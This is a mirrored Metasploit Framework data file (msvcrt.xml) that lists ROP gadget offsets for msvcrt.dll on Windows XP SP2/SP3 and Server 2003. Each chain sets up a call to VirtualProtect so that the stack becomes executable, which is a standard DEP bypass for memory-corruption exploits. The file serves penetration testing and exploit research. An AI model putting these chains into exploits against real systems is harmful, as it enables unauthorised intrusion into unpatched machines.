github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00
Code Releases Activity
be9d4ec393
metasploit-framework/data/ropdb/msvcrt.xml
sinn3r ba1b65742e Separate XML for various DLLs.
2012-10-02 11:27:10 -05:00

56 lines
2.2 KiB
XML
Raw Blame History

<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>WINDOWS XP SP2</target>
<target>WINDOWS XP SP3</target>
</compatibility>
<gadgets base="0x77c10000">
<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
<gadget offset="0x0002ee15">skip 4 bytes</gadget>
<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
<gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
<gadget offset="0x0002a184">POP ESI # RETN</gadget>
<gadget offset="0x0001aacc">JMP [EAX]</gadget>
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
<gadget offset="0x00002df9">PUSHAD # RETN</gadget>
<gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>WINDOWS SERVER 2003 SP1</target>
<target>WINDOWS SERVER 2003 SP2</target>
</compatibility>
<gadgets base="0x77ba0000">
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
<gadget value="junk">Filler</gadget>
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x00026320">POP EBP # RETN</gadget>
<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
<gadget offset="0x000385b7">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x000330fb">POP ECX # RETN</gadget>
<gadget offset="0x0004ff56">Writable location</gadget>
<gadget offset="0x00038a92">POP EDI # RETN</gadget>
<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
<gadget value="nop">nop</gadget>
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
</gadgets>
</rop>
</db>
View Git Blame Copy Permalink